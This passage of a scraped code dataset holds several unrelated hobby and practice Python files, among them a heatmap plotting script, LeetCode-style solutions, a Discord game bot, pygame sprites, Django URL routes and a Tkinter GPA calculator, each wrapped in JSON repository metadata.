pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['TP'][item]\r\n\t\t\t\tbesttn = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['TN'][item]\r\n\t\t\t\tbestfp = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['FP'][item]\r\n\t\t\t\tbestfn = pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['FN'][item]\r\n\t\t\t\tbestacc = round(np.array(pd.read_csv('./metrics/{}_metrics_{}.csv'.format(target,j))['ACC'].values)[item],4)\r\n\t\tz = z.reshape((10,5))\r\n\t\tz_min, z_max = z.min(), z.max()\r\n\t\tfig, ax = plt.subplots()\r\n\t\tc = ax.pcolormesh(x, y, z, cmap='BuPu', vmin=0, vmax=1)\r\n\t\tplt.xticks(np.arange(1,6)-0.5, ('JMI','MRMR','SKB','SP','WLCX'))\r\n\t\tplt.yticks(np.arange(1,11)-0.5, ('ADAC', 'BAGC', 'BNB', 'DTC', 'GNBC', 'KNNC', 'RFC', 'SGDC','SVMC', 'XGBC'))\r\n\t\tplt.xlabel('Feature Selection Method')\r\n\t\tplt.ylabel('Classifier')\r\n\t\t# row/col here (not i/j), so the outer loop variables used in the CSV and figure names are not clobbered\r\n\t\tfor row in range (0,10):\r\n\t\t\tfor col in range (0,5):\r\n\t\t\t\tplt.text(col+0.25,row+0.25,Decimal(z[row][col]).quantize(Decimal(\"0.00\")))\r\n\t\tfig.colorbar(c, ax=ax)\r\n\t\tplt.plot([0.05, 0.95], [1.95, 1.95], color='red', linestyle='-')\r\n\t\tplt.plot([0.05, 0.95], [1, 1], color='red', linestyle='-')\r\n\t\tplt.plot([0.05, 0.05], [1, 1.95], color='red', linestyle='-')\r\n\t\tplt.plot([0.95, 0.95], [1, 1.95], color='red', linestyle='-')\r\n\t\tplt.tight_layout()\r\n\r\n\t\tplt.savefig('fig_heatmap_{}_{}.png'.format(target,j))\r\n\t\tplt.savefig('fig_heatmap_{}_{}.pdf'.format(target,j))\r\n\t\tplt.savefig('fig_heatmap_{}_{}.tiff'.format(target,j))\r\n\t\tplt.show()","repo_name":"guangzhaohui/EC-paper","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9892790482","text":"def sumNumber(array, target):\n    if not array:\n        return None\n    if target is None:\n        return None\n\n    seen = {}\n    for i in array:\n        val = target - i\n        if val in seen:\n            return [val, i]\n        seen[i] = i\n    return None\n\n\narr = [2, 7, 11, 15]\ntarget = 8\nprint(sumNumber(arr, target))\n","repo_name":"razakadam74/Interview-Preparation","sub_path":"19th/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"73108993378","text":"'''\r\nprint(\"k\", 3+5)\r\nanswer = input('Mano que preguiça, pqp. Como cễ tá?')\r\nprint(answer)\r\nidade = int(input(\"Quantos anos tu tem mesmo?\"))\r\nprint(idade, type(idade))\r\nprint(f'vc tem {idade} anos e já tá {answer}')\r\n\r\n# string multiplication\r\nprint(\"sono\" * 20)\r\n'''\r\n\r\n# Exercise 1\r\n\r\nnome = input(\"Entre com seu nome completo: \\n\")\r\nprint('Nome completo: ', nome)\r\nprint('Maiúsculas: ', nome.upper())\r\nprint('Minúsculas: ', nome.lower())\r\nprint('Tamanho: ', len(nome))\r\nprint('Trocado', nome.replace('Brandani', 'do Inatel'))\r\n\r\n# Exercise 2\r\n\r\nnumero = int(input(\"Escolha um número: \"))\r\ninicio = int(input(\"Escolha o número de inicio da tabuada: \"))\r\nfim = int(input(\"Escolha o número de fim da tabuada: \"))\r\n\r\nwhile inicio <= fim:\r\n    print(f\"{numero}x{inicio} = {numero*inicio}\")\r\n    inicio += 1\r\n\r\n# Exercise 3\r\nsexo = 'nada'\r\nwhile(sexo != 'M' and sexo != 'F'):\r\n    sexo = input('Entre com M para homem ou F para mulher: ')\r\n","repo_name":"Uttoni/analise-de-dados-c111","sub_path":"Aula1IntroducaoPython.py","file_name":"Aula1IntroducaoPython.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39139161850","text":"# Group anagrams\nimport collections\nfrom typing import List\n\n\nclass Solution:\n    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n        mp = collections.defaultdict(list)\n\n        for st in strs:\n            key = \"\".join(sorted(st))\n            mp[key].append(st)\n\n        return list(mp.values())\n
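\n    # Example (illustrative): for ['eat', 'tea', 'tan', 'ate', 'nat', 'bat']\n    # the sorted-string keys are 'aet', 'ant' and 'abt', so the result is\n    # [['eat', 'tea', 'ate'], ['tan', 'nat'], ['bat']].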
\n\n    def group(self, strs):\n        if len(strs) < 2:\n            return strs\n        ans = {}\n        for s in strs:\n            count = [0] * 26\n            for c in s:\n                count[ord(c) - ord('a')] += 1\n            key = tuple(count)\n            ans[key] = ans.get(key, []) + [s]\n        return ans.values()\n    # return [[*x] for _, x in itertools.groupby(sorted(strs, key=sorted), sorted)]\n","repo_name":"mach8686devops/leetcode-100","sub_path":"0049.py","file_name":"0049.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43143595380","text":"import random\n\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\n\nfrom moosebot import MooseBot, cog_group\n\n\n@cog_group(\"Interactive\")\nclass GuessGame(Cog, name=\"Guessing Game\"):\n\n    def __init__(self, bot: MooseBot):\n        self.bot = bot\n        self.db = bot.database.db\n\n    async def get_input(self, ctx, datatype, error=''):\n        while True:\n            try:\n                message = await self.bot.client.wait_for('message', check=lambda message: message.author is ctx.author,\n                                                         timeout=60)\n                message = datatype(message.content)\n                return message\n            except Exception:\n                await ctx.send(error)\n\n    async def gameover(self, ctx, funct):\n        await ctx.send(\"Do you want to play again? (**Yes**/**No**)\")\n        self.message = await self.get_input(ctx, str)\n        self.message = self.message.lower()\n\n        if self.message == 'yes' or self.message == 'y':\n            await funct()\n        elif self.message == 'no' or self.message == 'n':\n            await ctx.send(\"Thanks for playing!\")\n        else:\n            await self.gameover(ctx, funct)\n\n    @commands.command(help=\"Guess the number game.\")\n    async def guess(self, ctx):\n\n        async def play():\n            channel = ctx.channel\n            await ctx.send(\"Guess a number between 1 and 100.\")\n            error = \"Please enter a number.\"\n            guess = await self.get_input(ctx, int, error)\n            answer = random.randint(1, 100)\n            counter = 0\n\n            while guess != answer:\n                counter += 1\n                if guess > answer:\n                    await ctx.send(\"{} your guess of `{}` is too high! Try again\".format(ctx.author.mention, guess))\n                    guess = await self.get_input(ctx, int, error)\n                else:\n                    await ctx.send(\"{} your guess of `{}` is too low! Try again\".format(ctx.author.mention, guess))\n                    guess = await self.get_input(ctx, int, error)\n            else:\n                if counter <= 1:\n                    await ctx.send(\"Congratulations! You got it on the first attempt!\")\n                else:\n                    await ctx.send(f\"Congratulations! It took you {counter} tries to guess the correct number.\")\n                await self.gameover(ctx, play)\n\n        await play()\n\n    @commands.command(help=\"Rock paper scissors game.\")\n    async def rps(self, ctx, amount=None):\n        user = str(ctx.author.id)\n        # normalize the bet: default to 1, resolve 'all' to the full balance,\n        # and convert numeric strings so the comparison below cannot fail\n        if amount is None:\n            amount = 1\n        elif amount == 'all':\n            amount = int((await self.db.money.find_one({'userid': user}))['balance'])\n        else:\n            amount = int(amount)\n        if amount <= 0:\n            await ctx.send(f\"You need to bet at least 1{MooseBot.currency} to play.\")\n\n        async def play():\n            await ctx.send(\"Let's play rock, paper, scissors. Select your weapon:\")\n            choices = ('rock', 'paper', 'scissors')\n            computer = choices[random.randint(0, 2)]\n            player = await self.get_input(ctx, str)\n            player = player.lower()\n            if player == 'r':\n                player = 'rock'\n            elif player == 's':\n                player = 'scissors'\n            elif player == 'p':\n                player = 'paper'\n\n            beats = {'rock': ['paper'],\n                     'paper': ['scissors'],\n                     'scissors': ['rock']}\n\n            if computer and player in choices:\n                if computer == player:\n                    await ctx.send(f\"**Tie!** You both chose {computer.title()}. 
You lose no {MooseBot.currency}.\")\n await self.gameover(ctx, play)\n elif player in beats[computer]:\n await ctx.send(\n f\"**You win!** Moosebot chose: {computer.title()}, and you chose: {player.title()}.You won {amount}{MooseBot.currency}.\")\n await self.db.money.update_one({'userid': str(ctx.author.id)}, {'$inc': {'balance': amount}})\n await self.gameover(ctx, play)\n else:\n await ctx.send(\n f\"**You lose!** Moosebot chose: {computer.title()}, and you chose: {player.title()}.You lost {amount}{MooseBot.currency}.\")\n await self.db.money.update_one({'userid': str(ctx.author.id)}, {'$inc': {'balance': -amount}})\n await self.gameover(ctx, play)\n else:\n await play()\n\n await play()\n\n\ndef setup(bot):\n bot.add_cog(GuessGame(bot.moose))\n","repo_name":"SilverEyess/MooseBot","sub_path":"moosebot/cogs/guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"2075268505","text":"from django.urls import path,include ,re_path\r\nfrom core import views\r\n\r\nurlpatterns = [\r\n path('',views.index,name='Dashboard'),\r\n path('Manage/',views.manage,name='Manage'),\r\n re_path('Orders/',views.orders,name='orders'),\r\n path('Profile/',views.profile,name='Profile'),\r\n path('Contact/',views.contact,name='Contact'),\r\n path('Logout/',views.logout,name='Logout'),\r\n path('Vendors/',views.vendors,name='vendors'),\r\n path('license/',views.license_order,name='home'),\r\n path('edit',views.Edit,name='edit'),\r\n path('update/',views.Update,name=\"update\"),\r\n path('delete/',views.Delete,name=\"delete\"),\r\n path('add',views.add,name='add'),\r\n \r\n \r\n]","repo_name":"amal512329/django_order","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33628866279","text":"# sprite classes for platform game\nimport pygame as pg\nfrom settings import *\nfrom random import choice, randrange\nvec = pg.math.Vector2\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game):\n self._layer = PLAYER_LAYER\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.walking = False\n self.jumping = False\n self.current_frame = 0\n self.last_update = 0\n self.load_images()\n self.image = self.standing_frames[0]\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH / 2, HEIGHT / 2)\n self.pos = vec(WIDTH / 2, HEIGHT - 40)\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def load_images(self):\n self.standing_frames_temp = [pg.image.load('./images/standing.png'),\n pg.image.load('./images/standing_1.png')] # Add a flipped idle animation\n self.standing_frames = []\n for frame in self.standing_frames_temp:\n self.standing_frames.append(pg.transform.scale(frame, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE)))\n \n self.walk_frames_r_temp = [pg.image.load('./images/run_0.png'),\n pg.image.load('./images/run_1.png'),\n pg.image.load('./images/run_2.png'),\n pg.image.load('./images/run_3.png'),\n pg.image.load('./images/run_4.png'),\n pg.image.load('./images/run_5.png'),\n pg.image.load('./images/run_6.png')]\n self.walk_frames_r = []\n for frame in self.walk_frames_r_temp:\n self.walk_frames_r.append(pg.transform.scale(frame, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE)))\n \n self.walk_frames_l = []\n for frame in 
self.walk_frames_r:\n self.walk_frames_l.append(pg.transform.flip(frame, True, False))\n \n self.jump_frame_r = pg.image.load('./images/jump.png') # Add a flipped jump spirte\n self.jump_frame_r = pg.transform.scale(self.jump_frame_r, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE))\n\n self.jump_frame_l = pg.transform.flip(self.jump_frame_r, True, False)\n\n self.wall_stick_r = pg.image.load('./images/wall_stick.png')\n self.wall_stick_r = pg.transform.scale(self.wall_stick_r, (PLAYER_IMG_WIDTH * PLAYER_SCALE, PLAYER_IMG_HEIGHT * PLAYER_SCALE))\n\n self.wall_stick_l = pg.transform.flip(self.wall_stick_r, True, False)\n\n def jump_cut(self):\n if self.jumping:\n if self.vel.y < -3: # If moving upwards y is negative, 3 if just a number\n self.vel.y = -3\n\n def jump(self):\n # jump only if standing on a platform\n # checks to see if the player is standing on a platform, if so the player can jump\n self.rect.y += 2\n hits = pg.sprite.spritecollide(self, self.game.platforms, False)\n self.rect.y -= 2\n hits_left = pg.sprite.spritecollide(self, self.game.left_wall_platforms, False)\n hits_right = pg.sprite.spritecollide(self, self.game.right_wall_platforms, False)\n if hits and not self.jumping:\n self.game.jump_sound.play()\n self.jumping = True\n self.vel.y = -PLAYER_JUMP\n if hits_left:\n self.game.jump_sound.play()\n self.vel.x += 30\n self.vel.y -= 20\n if hits_right:\n self.game.jump_sound.play()\n self.vel.x -= 30\n self.vel.y -= 20\n\n def update(self):\n self.animate()\n self.acc = vec(0, PLAYER_GRAV)\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT]:\n self.acc.x = -PLAYER_ACC\n if keys[pg.K_RIGHT]:\n self.acc.x = PLAYER_ACC\n \n if self.jumping and self.vel.x > 0: # jumping right sprite\n self.image = self.jump_frame_r\n if self.jumping and self.vel.x < 0: # jumping left sprite\n self.image = self.jump_frame_l\n\n hits_left = pg.sprite.spritecollide(self, self.game.left_wall_platforms, False)\n hits_right = pg.sprite.spritecollide(self, self.game.right_wall_platforms, False)\n if hits_left or hits_right:\n self.pos += self.vel + self.acc * PLAYER_WALL_FRICTION\n if hits_left:\n self.rect.midleft = self.pos\n self.image = self.wall_stick_l\n if hits_right:\n self.rect.midright = self.pos\n self.image = self.wall_stick_r\n else:\n # apply friction\n self.acc.x += self.vel.x * PLAYER_FRICTION\n # equations of motion\n self.vel += self.acc\n if abs(self.vel.x) < 0.1: # stops walking animation eventhough player standing still\n self.vel.x = 0\n self.pos += self.vel + 0.5 * self.acc\n self.rect.midbottom = self.pos\n\n def animate(self):\n now = pg.time.get_ticks()\n if self.vel.x != 0:\n self.walking = True\n else:\n self.walking = False\n # show walk animation\n if self.walking:\n if now - self.last_update > 100:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(self.walk_frames_l)\n if self.vel.x > 0:\n self.image = self.walk_frames_r[self.current_frame]\n else:\n self.image = self.walk_frames_l[self.current_frame]\n\n # show idle animation\n if not self.jumping and not self.walking:\n if now - self.last_update > 350:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(self.standing_frames)\n self.image = self.standing_frames[self.current_frame]\n\nclass Platform(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self._layer = PLATFORM_LAYER\n self.groups = game.all_sprites, game.platforms\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n images = [pg.image.load('./images/log_0.png'),\n 
pg.image.load('./images/log_1.png')]\n self.image = choice(images)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n if randrange(100) < POWERUP_SPAWN_PCT:\n Powerup(self.game, self)\n\nclass Platform_Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self._layer = PLATFORM_LAYER\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.image = pg.image.load('./images/log_wall.png')\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\nclass Powerup(pg.sprite.Sprite):\n def __init__(self, game, plat):\n self._layer = POWERUP_LAYER\n self.groups = game.all_sprites, game.powerups\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.plat = plat\n self.type = choice(['boost'])\n self.image = pg.image.load('./images/powerup_boost.png')\n self.image = pg.transform.scale(self.image, (int(BOOST_IMG_WIDTH / 2), int(BOOST_IMG_HEIGHT / 2)))\n self.rect = self.image.get_rect()\n self.rect.centerx = self.plat.rect.centerx\n self.rect.bottom = self.plat.rect.top - 5\n\n def update(self):\n self.rect.bottom = self.plat.rect.top - 5\n if not self.game.platforms.has(self.plat):\n self.kill()\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game):\n self._layer = MOB_LAYER\n self.groups = game.all_sprites, game.mobs\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image_up = pg.image.load('./images/bird.png')\n self.image_up = pg.transform.scale(self.image_up, (int(MOB_IMG_WIDTH / 5), int(MOB_IMG_HEIGHT / 5)))\n self.image_down = pg.image.load('./images/bird.png') # replace with different bird stance for animation\n self.image_down = pg.transform.scale(self.image_down, (int(MOB_IMG_WIDTH / 5), int(MOB_IMG_HEIGHT / 5)))\n self.image = self.image_up\n self.rect = self.image.get_rect()\n self.rect.centerx = choice([-100, WIDTH + 100])\n self.vx = randrange(1, 4)\n if self.rect.centerx > WIDTH:\n self.vx *= -1\n self.rect.y = randrange(HEIGHT / 2)\n self.vy = 0\n self.dy = 0.5\n\n def update(self):\n self.rect.x += self.vx\n self.vy += self.dy\n if self.vy > 3 or self.vy < -3:\n self.dy *= -1\n center = self.rect.center\n if self.dy < 0:\n self.image = self.image_up\n else:\n self.image = self.image_down\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.rect.y += self.vy\n if self.rect.left > WIDTH + 100 or self.rect.right < -100:\n self.kill()","repo_name":"J4RB/My-GitHub","sub_path":"Eksamensprojekt-i-gym/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7974107544","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n\r\ncheck = \"L\"\r\ndef Choice():\r\n global check\r\n if Course_Score.get() == 1 :\r\n Literal_Options.grid_forget()\r\n Percentage_Entry.configure(state = NORMAL)\r\n check = \"P\"\r\n\r\n elif Course_Score.get() == 0 :\r\n Percentage_Entry.delete(0,END)\r\n Percentage_Entry.configure(state = DISABLED)\r\n Literal_Options.grid(row = 0 ,column = 1)\r\n check = \"L\"\r\n\r\nCourses_Number = 0\r\ndef Add_Course():\r\n global Courses_Number ,check ,point\r\n score = DoubleVar()\r\n point = DoubleVar()\r\n if check == \"P\" :\r\n try :\r\n Percentage = float(Percentage_Entry.get())\r\n if Percentage >= 0.0 and Percentage <= 100.0 :\r\n if Percentage >= 90.0 and Percentage <= 100.0 :\r\n point = 4.0\r\n elif Percentage >= 85.0 and Percentage < 90.0 :\r\n point = 3.75\r\n elif Percentage >= 80.0 and Percentage < 85.0 :\r\n point = 
3.4\r\n elif Percentage >= 75.0 and Percentage < 80.0 :\r\n point = 3.1\r\n elif Percentage >= 70.0 and Percentage < 75.0 :\r\n point = 2.75\r\n elif Percentage >= 65.0 and Percentage < 70.0 :\r\n point = 2.5\r\n elif Percentage >= 60.0 and Percentage < 65.0 :\r\n point = 2.2\r\n elif Percentage >= 50.0 and Percentage < 60.0 :\r\n point = 2.0\r\n elif Percentage >= 0.0 and Percentage < 50.0 :\r\n point = 1.0\r\n\r\n Courses_Number += 1\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n HoursList.append(hours.get())\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n ScoreList.append(point)\r\n score = point\r\n TotalList.append( float(score * hours.get()) )\r\n\r\n else :\r\n Percentage_Entry.delete(0 ,END)\r\n tkinter.messagebox.showerror(\"ERROR !\" ,\"You must enter a value between 0 and 100\")\r\n\r\n except ValueError :\r\n Percentage_Entry.delete(0 ,END)\r\n tkinter.messagebox.showerror(\"ERROR !\" ,\"You must enter a value between 0 and 100\")\r\n\r\n elif check == \"L\" :\r\n Courses_Number += 1\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n HoursList.append(hours.get())\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n ScoreList.append(Literal_Points.get(letter.get()))\r\n score = Literal_Points.get(letter.get())\r\n TotalList.append( float(score * hours.get()) )\r\n\r\ndef Undo() :\r\n global Courses_Number\r\n if len(TotalList) != 0 :\r\n HoursList.pop()\r\n ScoreList.pop()\r\n TotalList.pop()\r\n Courses_Number -= 1\r\n if Courses_Number == 0 and sum(HoursList) == 0 :\r\n Courses_Number_Display.configure(text = \"\")\r\n Hours_Number_Display.configure(text = \"\")\r\n Letter.configure(text = \"\")\r\n else :\r\n Courses_Number_Display.configure(text = Courses_Number)\r\n Hours_Number_Display.configure(text = sum(HoursList))\r\n\r\n Percentage_Entry.delete(0 ,END)\r\n GPA_Display.configure(text = \"\")\r\n Grade_Display.configure(text = \"\")\r\n\r\n else: tkinter.messagebox.showwarning(\"Warning !\" ,\"You didn't add any course to undo addition\")\r\n\r\ndef Caculate_GPA() :\r\n if sum(HoursList) != 0 :\r\n gpa = float(sum(TotalList)/sum(HoursList))\r\n print (\"Course Points * Hours = \")#227.29999999999995\r\n print (sum(TotalList))\r\n print (\"Hours = \")#93\r\n print (sum(HoursList))\r\n grade = StringVar()\r\n f_color = StringVar()\r\n let = StringVar()\r\n \r\n if gpa >= 3.4 and gpa <= 4.0 :\r\n grade = \"Excellent\"\r\n f_color = \"green\"\r\n let = \"A\"\r\n elif gpa >= 2.8 and gpa < 3.4 :\r\n grade = \"Very Good\"\r\n f_color = \"#000fff000\"\r\n let = \"B\"\r\n elif gpa >= 2.4 and gpa < 2.8 :\r\n grade = \"Good\"\r\n f_color = \"orange\"\r\n let = \"C\"\r\n elif gpa >= 2.0 and gpa < 2.4 :\r\n grade = \"Pass\"\r\n f_color = \"red\"\r\n let = \"D\"\r\n elif gpa >= 1.4 and gpa < 2.0 :\r\n grade = \"Weak\"\r\n f_color = \"magenta\"\r\n let = \"F\"\r\n elif gpa < 1.4 :\r\n grade = \"Very Weak\"\r\n f_color = \"purple\"\r\n let = \"F\"\r\n else :\r\n grade = \"asd\"\r\n let = \"asd\"\r\n\r\n\r\n\r\n GPA_Display.configure(text = round(gpa ,3))\r\n Grade_Display.configure(text = grade ,fg = f_color)\r\n Letter.configure(text = let)\r\n\r\n else :tkinter.messagebox.showwarning(\"Warning !\" ,\"You must add a course to be calculated\")\r\n\r\ndef New():\r\n global check ,Courses_Number\r\n CheckBtn.deselect()\r\n Courses_Number = 0\r\n Percentage_Entry.delete(0,END)\r\n Percentage_Entry.configure(state = DISABLED)\r\n Literal_Options.grid(row = 0 ,column = 1)\r\n check = \"L\"\r\n Courses_Number_Display.configure(text = 
\"\")\r\n Hours_Number_Display.configure(text = \"\")\r\n GPA_Display.configure(text = \"\")\r\n Grade_Display.configure(text = \"\")\r\n Letter.configure(text = \"\")\r\n \r\n ScoreList.clear()\r\n HoursList.clear()\r\n TotalList.clear()\r\n\r\ndef About():\r\n root.maxsize(width = 280 ,height = 400)\r\n Photo_lbl.pack(side = BOTTOM)\r\n tkinter.messagebox.showinfo(\"\" ,\"Created by :\\nMohammed Raafat Ibrahim\\n\\nWe don't forget our classmate Amr Hendy\")\r\n Photo_lbl.pack_forget()\r\n root.maxsize(width = 280 ,height = 270)\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************ROOT***************************ROOT*************************ROOT*************************** ROOT ************************************************************ ROOT\r\n#*********************************************************************************************************************************************************************************\r\nroot = Tk()\r\nroot.title(\"GPA Calculator\")\r\n\r\nletter = StringVar()\r\nletter.set(\"A+\")\r\nhours = IntVar()\r\nCourse_Score = IntVar()\r\nScoreList = []\r\nHoursList = []\r\nTotalList = []\r\nLiteral_Points = {'A+':4.0,'A':3.75,'B+':3.4,'B':3.1,'C+':2.75,'C':2.5,'D+':2.2,'D':2.0,'F':1.0}\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************Top Frame***************************Top Frame**********************Top Frame***************************** Top Frame ************************************ Top Frame\r\n#*********************************************************************************************************************************************************************************\r\nTop_Frame = Frame(root)\r\nTop_Frame.pack(side = TOP)\r\n\r\nCourse_Score_Hours = LabelFrame(Top_Frame ,relief = FLAT)\r\nCourse_Score_Hours.pack(side = TOP )\r\n\r\nCourse_Score_LabelFrame = LabelFrame(Course_Score_Hours ,text = \"Course Score\")\r\nCourse_Score_LabelFrame.pack(side = LEFT ,padx = 5)\r\n\r\nHours_lblFrame = LabelFrame(Course_Score_Hours ,text = \"Course Hours\")\r\nHours_lblFrame.pack(side = RIGHT ,padx = 5)\r\n\r\nLabel(Course_Score_LabelFrame ,text = \"Literal Grade\").grid(row =0)\r\n\r\nCheckBtn = Checkbutton(Course_Score_LabelFrame ,text = \"Percentage \" ,variable = Course_Score ,onvalue = 1 ,offvalue = 0 ,command = Choice)#Check Button\r\nCheckBtn.grid(row = 1)\r\n\r\nPercentage_Entry = Entry(Course_Score_LabelFrame ,width = 5 ,state = DISABLED) #Percentage Entry ***************************************** Percentage Entry\r\nPercentage_Entry.grid(row = 1 ,column = 1)\r\n\r\nLabel(Course_Score_LabelFrame ,text = \"%\").grid(row = 1 ,column = 3)\r\n\r\nLiteral_Options = OptionMenu(Course_Score_LabelFrame ,letter ,\"A+\" ,\"A\" ,\"B+\" ,\"B\" ,\"C+\" ,\"C\" ,\"D+\" ,\"D\" ,\"F\" )#Opthin Menu ************** Opthin Menu\r\nLiteral_Options.grid(row = 0 ,column = 1)\r\n\r\nRadiobutton(Hours_lblFrame ,text = \"2\" ,variable = hours ,value = 2).pack(side = LEFT) #Radio Button for hour 2 ************************** Radio Button for hour 2\r\nHours_RadioBtn = Radiobutton(Hours_lblFrame ,text = \"3\" ,variable = hours ,value = 3) #Radio Button for hour 2 *************************** Radio Button for hour 2\r\nHours_RadioBtn.pack(side = 
RIGHT)\r\nHours_RadioBtn.select()\r\n\r\nGPA_Grade_Frame = Frame(Top_Frame ,relief = FLAT)\r\nGPA_Grade_Frame.pack(side = BOTTOM ,pady = 5)\r\n\r\nButton(GPA_Grade_Frame ,text = \"Add Course\" ,command = Add_Course ,bg = \"#e6e6e6\").grid(row = 0 ,pady = 5) #******************************* Add Course Button\r\n\r\nButton(GPA_Grade_Frame ,text = \"Undo\" ,command = Undo).grid(row = 1) #Undo Button ********************************************************* Undo Button\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Courses No. :\").grid(row = 0 ,column = 1 ,pady = 2)\r\nCourses_Number_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Courses No. Display ******************************************* Courses No. Display\r\nCourses_Number_Display.grid(row = 0, column = 2 ,pady = 2)\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Hours No. :\").grid(row = 1 ,column = 1 ,pady = 2)\r\nHours_Number_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Hours No. Display *********************************************** Hours No. Display\r\nHours_Number_Display.grid(row = 1 ,column = 2 ,pady = 2)\r\n\r\nButton(GPA_Grade_Frame ,text = \"Calculate GPA\" ,width = 15 ,command = Caculate_GPA ,bg = \"#d2d2d2\").grid(row = 2 ,columnspan = 3 ,pady = 5) #Calculate GPA Button\r\n\r\nLabel(GPA_Grade_Frame ,text = \"GPA :\").grid(row = 3)\r\n\r\nGPA_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 15) #GPA Display ************************************************************** GPA Display\r\nGPA_Display.grid(row = 3 ,column = 1)\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Grade :\").grid(row = 4)\r\nGrade_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 15) #Grade Display ********************************************************** Grade Display\r\nGrade_Display.grid(row = 4 ,column = 1)\r\n\r\nLetter = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Letter Display ***************************************************************** Letter Display\r\nLetter.grid(row = 3 ,rowspan = 2 ,column = 3)\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************Bottom Frame***************************Bottom Frame**********************Bottom Frame*************************** Bottom Frame *********************** Bottom Frame\r\n#*********************************************************************************************************************************************************************************\r\n\r\nBottom_Frame = Frame(root)\r\nBottom_Frame.pack(side = BOTTOM)\r\n\r\nButtons_LabelFrame = LabelFrame(Bottom_Frame ,relief = FLAT)\r\nButtons_LabelFrame.pack(side = TOP ,pady = 5)\r\n\r\nButton(Buttons_LabelFrame ,text = \" New \" ,command = New ,bg = \"#e6e6e6\").pack(side =LEFT ,padx = 15) #New Button ************************* New Button\r\n\r\nButton(Buttons_LabelFrame ,text = \"About\" ,command = About ,bg = \"#e6e6e6\").pack(side = RIGHT ,padx = 15) #About Button ******************** About Button\r\n\r\nPhoto = PhotoImage(file = \"Amr.png\") #Photo ************************************************************************************************* Photo\r\nPhoto_lbl = Label(Bottom_Frame ,image = Photo)\r\n\r\n#root.maxsize(width= 280 ,height = 270)\r\nroot.minsize(width= 280 ,height = 270)\r\n\r\nroot.mainloop()\r\n","repo_name":"Mohammed-Raafat/GPA-Calculator","sub_path":"GPA Calculator.py","file_name":"GPA 
Calculator.py","file_ext":"py","file_size_in_byte":11856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29996712525","text":"import sys\ninput = sys.stdin.readline\n\ntc = int(input())\n\nfor _ in range(tc):\n    flag = False\n    n = int(input())\n    numbers = [input().strip() for i in range(n)]\n    numbers.sort()\n    for i in range(n-1):\n        num1 = numbers[i]\n        len1 = len(num1)\n        for j in range(i+1, n):\n            num2 = numbers[j]\n            if len(num2) > len1:\n                if num2[:len1] == num1:\n                    print('NO')\n                    flag = True\n                    break\n        if flag:\n            break\n    if not flag:\n        